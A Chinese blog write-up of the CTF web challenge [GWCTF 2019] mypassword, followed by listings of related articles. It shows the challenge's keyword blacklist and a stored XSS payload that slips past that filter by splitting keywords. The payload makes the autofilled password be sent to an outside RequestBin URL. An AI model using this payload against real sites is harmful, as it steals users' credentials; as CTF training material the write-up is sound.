[GWCTF 2019]mypassword

最新推荐文章于 2023-03-01 19:50:14 发布
最新推荐文章于 2023-03-01 19:50:14 发布
阅读量1.5k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105765460
版权

#题目:
image.png
image.png
image.png
三个界面,注册界面源代码毛都没有,登录界面源代码里面有东西

if (document.cookie && document.cookie != '') {
	var cookies = document.cookie.split('; ');
	var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
		var arr = cookies[i].split('=');
		var key = arr[0];
		cookie[key] = arr[1];
	}
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
		document.getElementsByName("username")[0].value = cookie['user'];
		document.getElementsByName("password")[0].value = cookie['psw'];
	}
}

#意思很明确,就是用户名和密码都写入了表单
#下面我们注册一下
登录进去之后,出现feedback界面
image.png
点进去看一下
image.png
发现源码里有文章

if(is_array($feedback)){
				echo "<script>alert('反馈不合法');</script>";
				return false;
			}
			$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
			foreach ($blacklist as $val) {
		        while(true){
		            if(stripos($feedback,$val) !== false){
		                $feedback = str_ireplace($val,"",$feedback);
		            }else{
		                break;
		            }
		        }
		    }

显而易见给过滤了不少东西,由于我们已经知道login.js有记录密码的功能。
这时候就要介绍我们的http://http.requestbin.buuoj.cn
网址,(RequestBin提供了一个URL,该URL将收集对其发出的请求,首页点击create a requestbin)
构造POC就很简单了

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/y6b4uwy6/?a="+psw;
</scrcookieipt>

提交成功之后去BIN里面看一下
image.png
image.png

浩歌已行
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
qq_41755084的博客
08-09 310
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 284
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
mypassword2.zip
05-21
密码本第二版本
MyPassword:安卓
04-30
android_MyPassword 自用的密码管理工具
mypassword.zip
05-18
利用云数据库简单开发的小程序,没有性能,仅供学习和自用。有空就更新,没空就凑合着用
MyPassword
04-08
MyPassword单机密码管理软件可直接运行,Android直接使用
MyPassword:一款开源的密码管理软件,小巧,好用
03-22
密码管理 邮箱: 档案编码:GBK 简介: 一款开源的密码管理软件,用于保存生活中遇到的各种难记或不常用的账号和密码。安全,简洁,放心,无广告。QQ账号?微信号?邮箱密码?网站通行证?种现在好了,通通提交软件来记住吧,你只是只需要画一个解锁图案。 一句话描述:一款开源的密码管理软件,小巧、好用。 关键词:密码管理账号管理密码我的密码密码工具 版本 ### 4.0.0已完成 集成友盟自动更新 优化密码显示:更简洁,易用 统一ActionBar和EditText主题 ### 3.1.0已完成 增加修改,编辑密码的自动提示功能 增加意见反馈功能(阿里云ACE) 去掉列表特效 ### 2.1.0已完成 更换应用图标 第一次进入程序增加提示 ### 2.0.0已完成 增加引入导出功能 增加密码置顶功能 优化投放菜单 修复密码列表时间显示不对的BUG ### 1.4.0已完成 增加图案解锁 提升
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 651
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
buu刷题(第一周)
qq_62046696的博客
03-01 731
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
MyPassword:为您生成和管理密码的 Android 应用
06-29
我的密码 介绍 MyPassword 是一个用于生成和管理密码的安卓应用程序。
【代码审计】buu_[GWCTF 2019]mypassword
serendipity1130的博客
06-09 541
1.页面打开像是注入,现注册登录后发现并非注入,如下:2.在登陆界面发现./js/login.js,打开查看到如下的js代码: 代码解读:代码会把cookie中的username和password填进当前表单思路:由于是后端执行js,所以构造js即可。先写一个有表单的页面,调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求,就能得到管理员cookie。现在看在哪里以及如何发送请求。3.由于在各页面查看源码,在首页发现feedback.php:打开其源码可看到注释:代码分
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 392
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
[GWCTF 2019]mypassword XSS
qq_54929891的博客
06-22 388
放假
BUUCTF__[GWCTF 2019]mypassword_题解
风过江南乱的博客
04-29 823
BUUCTF__[GWCTF 2019]mypassword_题解 XSS获取admin cookie
jdbc链接sqlserver2019
最新发布
04-11
可以使用Java编程语言中的JDBC API来连接SQL Server 2019数据库。需要先下载并安装对应的JDBC驱动程序,然后在Java程序中使用合适的连接字符串、用户名和密码等连接参数,如下所示: ``` // 导入JDBC相关的类 import java.sql.*; public class TestJDBC { public static void main(String[] args) { // 数据库连接参数 String url = "jdbc:sqlserver://localhost:1433;DatabaseName=mydatabase"; String user = "myusername"; String password = "mypassword"; // 连接数据库 try { Connection conn = DriverManager.getConnection(url, user, password); System.out.println("成功连接到数据库!"); // 其他操作 } catch (SQLException e) { e.printStackTrace(); System.out.println("连接数据库失败!"); } } } ``` 在以上代码中,`url`参数指定了SQL Server的连接地址和端口号,以及要连接的数据库名;`user`和`password`则是登录数据库所需的用户名和密码。使用`DriverManager`类的`getConnection`方法即可建立数据库连接。连接成功后,就可以进行执行SQL语句的操作了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值